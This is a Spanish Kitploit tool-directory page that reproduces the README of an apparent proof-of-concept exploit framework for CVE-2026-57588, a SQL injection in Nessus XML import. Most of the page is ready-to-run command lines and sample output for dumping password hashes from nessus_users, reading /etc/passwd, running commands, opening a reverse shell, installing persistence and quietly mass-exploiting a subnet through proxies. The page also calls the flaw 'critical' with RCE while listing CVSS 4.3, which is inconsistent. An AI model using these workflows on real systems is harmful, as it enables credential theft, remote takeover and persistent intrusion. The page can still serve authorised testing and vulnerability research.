Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming
Seguridad de Bases de Datos
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Ver Repositorio
11hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1.

Compartir

🛡️ CVE-2026-57588 - Framework de Explotación de Inyección SQL en Nessus

Security Research CVE Version Python License


📋 Tabla de Contenidos

  • Descripción General
  • Detalles de la Vulnerabilidad
  • Características
  • Instalación
  • Inicio Rápido
  • Ejemplos de Uso
  • Tipos de Payload
  • Escenarios Avanzados
  • Informes
  • Solución de Problemas
  • Consideraciones de Seguridad
  • Licencia

  • 🔍 Descripción General

    CVE-2026-57588 es una vulnerabilidad crítica de inyección SQL descubierta en Tenable Nessus versiones 10.12.0 y anteriores. La vulnerabilidad reside en el mecanismo de análisis XML al importar archivos de resultados de escaneo .nessus, lo que permite a usuarios autenticados con privilegios de importación ejecutar consultas SQL arbitrarias contra la base de datos PostgreSQL del backend.


    ⚠️ Detalles de la Vulnerabilidad

    PropiedadValor
    ID de CVECVE-2026-57588
    Tipo de VulnerabilidadInyección SQL
    Productos AfectadosTenable Nessus 10.12.0 y anteriores
    Versión CorregidaNessus 10.12.1 y posteriores
    Puntuación CVSS4.3 (Media)
    Vector de AtaqueRed
    Complejidad de AtaqueBaja
    Privilegios RequeridosAutenticado (Permisos de importación)
    Interacción del UsuarioRequerida (Ingeniería social)
    ImpactoExfiltración de datos, RCE

    🔬 Detalles Técnicos

    La vulnerabilidad existe debido a una sanitización insuficiente de los valores de las etiquetas XML antes de que se incorporen a las consultas SQL durante el proceso de importación. Un actor malicioso puede crear un archivo .nessus que contenga payloads de inyección SQL especialmente diseñados en etiquetas XML como:

    • hostname
    • fqdn
    • os
    • system-type
    • mac-address
    • netbios-name

    Cuando un usuario privilegiado importa el archivo malicioso, los valores no sanitizados se ejecutan contra el backend de PostgreSQL, lo que permite:

    • Enumeración de la base de datos
    • Exfiltración de datos
    • Ejecución de comandos
    • Acceso al sistema de archivos
    • Instalación de persistencia

    ✨ Características

    Haz clic para expandir la lista de características

    🎯 Gestión de Payloads

    • Más de 13 tipos de payload categorizados por propósito
    • Generación de payloads basada en plantillas
    • Creación y validación de payloads personalizados
    • Validación de parámetros y comprobación de sintaxis
    • Verificación de sintaxis SQL

    🚀 Capacidades de Explotación

    • Explotación multi-etapa con ejecución en paralelo
    • Fingerprinting y enumeración de bases de datos
    • Exfiltración de datos con selección personalizada de tablas/columnas
    • Ejecución de comandos en el sistema objetivo
    • Acceso y lectura del sistema de archivos
    • Reverse shell con sesión interactiva
    • Mecanismos de instalación de persistencia
    • Inyección SQL ciega basada en tiempo
    • Inyección SQL ciega basada en booleanos
    • Inyección SQL basada en errores
    • Consultas apiladas (stacked queries) para explotación avanzada
    • Exfiltración DNS fuera de banda (out-of-band)

    📊 Informes y Registros

    • Informes HTML con estilo profesional
    • Informes Markdown para documentación
    • Informes JSON para automatización
    • Informes de texto para revisión rápida
    • Rotación de logs con múltiples niveles
    • Estadísticas detalladas de ejecución
    • Hash de archivos para verificación de integridad

    🛠️ Funciones Avanzadas

    • Ejecución en paralelo con trabajos configurables
    • Soporte de proxy para operaciones sigilosas
    • Gestión de certificados SSL/TLS
    • Validación XML y comprobación de esquemas
    • Modo interactivo para explotación en vivo
    • Mecanismo de reintentos para mayor fiabilidad
    • Configuración de timeout para conexiones lentas

    📦 Herramientas Profesionales

    • Estructura CLI basada en subcomandos
    • Modos verboso y silencioso
    • Salida de terminal en color
    • Indicadores de progreso para tareas largas
    • Soporte de Docker para pruebas contenerizadas
    • Compatibilidad multiplataforma (Linux, Windows, macOS)

    📦 Instalación

    🐍 Requisitos Previos

    • Python 3.7 o superior
    • pip (gestor de paquetes de Python)
    • Git (opcional, para clonar)

    🔧 Instalación Rápida

    root@kitploit:~
    # Clone the repository
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # Create and activate virtual environment
    python3 -m venv venv
    source venv/bin/activate  # On Windows: venv\Scripts\activate
    
    # Install dependencies
    pip install -r requirements.txt
    
    # Verify installation
    python3 exploit.py --version
    

    🐳 Instalación con Docker

    root@kitploit:~
    # Build the Docker image
    docker build -t nessus-exploit .
    
    # Run the tool
    docker run -it --rm nessus-exploit generate -u https://test.com -p enum
    

    📦 Instalación como Paquete

    root@kitploit:~
    # Install as a package
    pip install -e .
    
    # Now you can run from anywhere
    nessus-exploit generate -u https://test.com -p enum
    

    🚀 Inicio Rápido

    Uso Básico

    root@kitploit:~
    # Generate a basic enumeration exploit
    python3 exploit.py generate -u https://test.com -p enum
    
    # Generate advanced multi-stage exploit
    python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus
    
    # Extract data from database
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    

    Ayuda de Comandos

    root@kitploit:~
    # Show general help
    python3 exploit.py --help
    
    # Show generate command help
    python3 exploit.py generate --help
    
    # List all available payloads
    python3 exploit.py list
    

    💡 Ejemplos de Uso

    1. Enumeración Básica

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p enum
    
    Salida Esperada
    root@kitploit:~
    [2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
    [2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
    [2026-07-22 10:15:23] [INFO] [*] Payload: enum
    [2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
    [2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
    [2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
    [2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
    [2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s
    
    ============================================================
    EXPLOITATION SUMMARY
    ============================================================
    Target: https://test.com
    Status: SUCCESS
    Duration: 2.15s
    Files Generated: 3
    Reports Generated: 3
    ============================================================
    

    2. Explotación Avanzada Multi-Etapa

    root@kitploit:~
    python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v
    

    3. Exfiltración de Datos

    root@kitploit:~
    # Extract user credentials
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # Extract with custom columns
    python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status
    

    4. Reverse Shell

    root@kitploit:~
    # Start listener and generate exploit
    python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus
    

    5. Ejecución de Comandos

    root@kitploit:~
    # Execute basic commands
    python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"
    
    # Execute complex commands
    python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"
    

    6. Lectura de Archivos

    root@kitploit:~
    # Read system files
    python3 exploit.py generate -u https://test.com -p file -f /etc/passwd
    
    # Read application logs
    python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log
    

    7. Inyección Ciega Basada en Tiempo

    root@kitploit:~
    # 5-second delay
    python3 exploit.py generate -u https://test.com -p sleep -s 5
    
    # 30-second delay for heavy tests
    python3 exploit.py generate -u https://test.com -p sleep -s 30
    

    8. Con Soporte de Proxy

    root@kitploit:~
    # HTTP proxy
    python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080
    
    # HTTPS proxy with authentication
    python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080
    

    9. Ejecución en Paralelo

    root@kitploit:~
    # Run with 8 parallel jobs
    python3 exploit.py generate -u https://test.com -p advanced --jobs 8
    
    # With custom timeout and retries
    python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5
    

    10. Modos Verboso y Silencioso

    root@kitploit:~
    # Verbose mode (detailed output)
    python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log
    
    # Quiet mode (minimal output)
    python3 exploit.py generate -u https://test.com -p advanced -q
    

    📚 Tipos de Payload

    Categoría: FINGERPRINTING

    PayloadDescripciónParámetros
    fingerprintFingerprinting de la base de datosNinguno

    Categoría: UNION

    PayloadDescripciónParámetros
    schema_dumpVolcar el esquema de la base de datosNinguno
    data_exfilExtraer datos de tablastable, columns

    Categoría: TIMING

    PayloadDescripciónParámetros
    time_basedInyección ciega basada en tiempodelay
    boolean_blindCiega basada en booleanoscondition, delay

    Categoría: FILE_ACCESS

    PayloadDescripciónParámetros
    file_readLeer archivos del sistemapath, offset, length

    Categoría: COMMAND_EXEC

    PayloadDescripciónParámetros
    command_execEjecutar comandos del sistemacommand

    Categoría: REVERSE_SHELL

    PayloadDescripciónParámetros
    reverse_shellEstablecer reverse shellhost, port

    Categoría: PERSISTENCE

    PayloadDescripciónParámetros
    persistenceInstalar persistenciaNinguno

    Categoría: ERROR_BASED

    PayloadDescripciónParámetros
    error_basedInyección basada en erroresquery

    Categoría: STACKED

    PayloadDescripciónParámetros
    stacked_queriesConsultas apiladasquery

    Categoría: OUT_OF_BAND

    PayloadDescripciónParámetros
    oob_dnsExfiltración DNShost, data

    🎯 Escenarios Avanzados

    Escenario 1: Flujo de Trabajo de Compromiso Completo

    root@kitploit:~
    # Step 1: Enumerate the database
    python3 exploit.py generate -u https://test.com -p enum -v
    
    # Step 2: Extract sensitive data
    python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email
    
    # Step 3: Establish persistence
    python3 exploit.py generate -u https://test.com -p persist
    
    # Step 4: Set up reverse shell
    python3 exploit.py generate -u https://test.com -p shell -lp 4444
    

    Escenario 2: Operaciones Sigilosas

    root@kitploit:~
    # Using proxy and quiet mode
    python3 exploit.py generate -u https://test.com -p advanced \
        --proxy http://127.0.0.1:8080 \
        --no-ssl-verify \
        -q \
        -o stealth_scan.nessus
    

    Escenario 3: Pipeline de Pruebas Automatizadas

    root@kitploit:~
    #!/bin/bash
    # auto_exploit.sh - Automated exploitation script
    
    TARGET="https://test.com"
    OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
    mkdir -p $OUTPUT_DIR
    
    # Run all payloads
    for payload in enum dump shell persist; do
        echo "[*] Running payload: $payload"
        python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
    done
    
    # Generate comprehensive report
    python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"
    

    Escenario 4: Evaluación de Seguridad Empresarial

    root@kitploit:~
    # Network-wide assessment
    for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
        echo "[*] Testing: $target"
        python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
    done
    

    Escenario 5: Recopilación de Evidencias

    root@kitploit:~
    # Collect comprehensive evidence
    python3 exploit.py generate -u https://test.com -p advanced \
        --file /etc/hosts \
        --command "systemctl status nessusd" \
        --table nessus_users \
        --columns username,password_hash,email,last_login \
        -v \
        --log-file evidence.log
    

    📊 Informes

    Formatos de Informe Disponibles

    FormatoDescripciónUso
    HTMLInforme HTML profesional con estilos--format html
    MarkdownFormato Markdown para documentación--format markdown
    JSONJSON para automatización--format json
    TextoTexto plano para revisión rápida--format text

    Generar Informes

    root@kitploit:~
    # Generate all report formats
    python3 exploit.py report -i results.json -o report
    
    # Generate HTML report only
    python3 exploit.py report -i results.json -o report.html --format html
    
    # Generate Markdown report
    python3 exploit.py report -i results.json -o report.md --format markdown
    

    Contenido del Informe

    • Información del objetivo
    • ID de sesión y tipo de payload
    • Estadísticas de ejecución
    • Lista de archivos generados
    • Hashes de archivos para integridad
    • Registros de errores (si los hay)
    • Avisos legales y advertencias

    🔧 Solución de Problemas

    Problemas Comunes y Soluciones

    Problema 1: Errores de Conexión
    root@kitploit:~
    # Error: Connection refused
    # Solution: Check if Nessus is running and port is accessible
    python3 exploit.py generate -u https://test.com:8834 -p enum
    
    # Error: SSL certificate verification failed
    # Solution: Disable SSL verification
    python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
    
    Problema 2: Errores de Validación XML
    root@kitploit:~
    # Error: Invalid XML structure
    # Solution: Disable XML validation
    python3 exploit.py generate -u https://test.com -p enum --no-validate
    
    Problema 3: Errores de Payload
    root@kitploit:~
    # Error: Missing required parameter
    # Solution: Check payload requirements
    python3 exploit.py validate -p command_exec
    
    # Then provide required parameters
    python3 exploit.py generate -u https://test.com -p exec --command "whoami"
    
    Problema 4: Permiso Denegado
    root@kitploit:~
    # Error: Cannot write files
    # Solution: Check directory permissions
    chmod 755 ./outputs/
    python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
    
    Problema 5: Problemas de Timeout
    root@kitploit:~
    # Error: Operation timed out
    # Solution: Increase timeout
    python3 exploit.py generate -u https://test.com -p advanced --timeout 120
    
    # Or use retries
    python3 exploit.py generate -u https://test.com -p advanced --retries 5
    

    🔐 Consideraciones de Seguridad

    ⚠️ Advertencias Importantes

    1. Cumplimiento Legal: Utilice únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito por escrito para realizar pruebas
    2. Protección de Datos: Maneje las credenciales y los datos extraídos con extremo cuidado
    3. Entorno Aislado: Pruebe siempre en entornos de laboratorio aislados
    4. Copias de Seguridad: Realice siempre copias de seguridad de las bases de datos antes de probar
    5. Restauración: Restaure los sistemas a su estado original después de las pruebas
    6. Documentación: Documente todas las actividades de prueba para el cumplimiento normativo

    ✅ Buenas Prácticas

    1. Utilice cuentas de prueba dedicadas
    2. Mantenga registros detallados de todas las acciones
    3. Utilice VPN/proxy para mantener el anonimato al probar sistemas de terceros
    4. Siga las pautas de divulgación responsable
    5. Eduque a su equipo sobre la vulnerabilidad

    📝 Licencia

    Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.


    🤝 Contribuciones

    ¡Las contribuciones son bienvenidas! No dude en enviar un Pull Request.

    Configuración de Desarrollo

    root@kitploit:~
    # Clone repository
    git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
    
    # Install development dependencies
    pip install -r requirements-dev.txt
    
    # Run tests
    pytest
    
    # Format code
    black exploit.py
    
    # Check linting
    flake8 exploit.py
    

    📞 Soporte

    Documentación

    • Aviso de Seguridad Oficial de Tenable
    • Entrada en la Base de Datos de CVE
    • Documentación de Nessus

    Contacto

    • Autor: Sudeepa Wanigarathna
    • Email: [email protected]
    • GitHub: CerberusMrXi

    📄 Registro de Cambios

    Versión 1.0.0 (2026-07-22)

    Versión Inicial

    • ✅ Framework de explotación integral
    • ✅ 13 tipos de payload categorizados por propósito
    • ✅ Explotación multi-etapa con ejecución en paralelo
    • ✅ Validación XML y comprobación de esquemas
    • ✅ Múltiples formatos de informe (HTML, Markdown, JSON, Texto)
    • ✅ Hash automático de archivos y verificación de integridad
    • ✅ Registro profesional con rotación
    • ✅ Soporte de proxy para operaciones sigilosas
    • ✅ Reverse shell con sesión interactiva
    • ✅ Mecanismos de persistencia
    • ✅ Ejecución de comandos y lectura de archivos
    • ✅ Inyección ciega basada en tiempo y en booleanos
    • ✅ Inyección basada en errores y consultas apiladas
    • ✅ Exfiltración DNS fuera de banda (out-of-band)
    • ✅ Soporte de Docker
    • ✅ Compatibilidad multiplataforma

    ⬆ Volver Arriba


    ⚠️ AVISO LEGAL: Esta herramienta es SOLO para pruebas de seguridad EDUCATIVAS y AUTORIZADAS. El uso no autorizado es ILEGAL. El autor no asume NINGUNA RESPONSABILIDAD por el mal uso.

    Descargar herramienta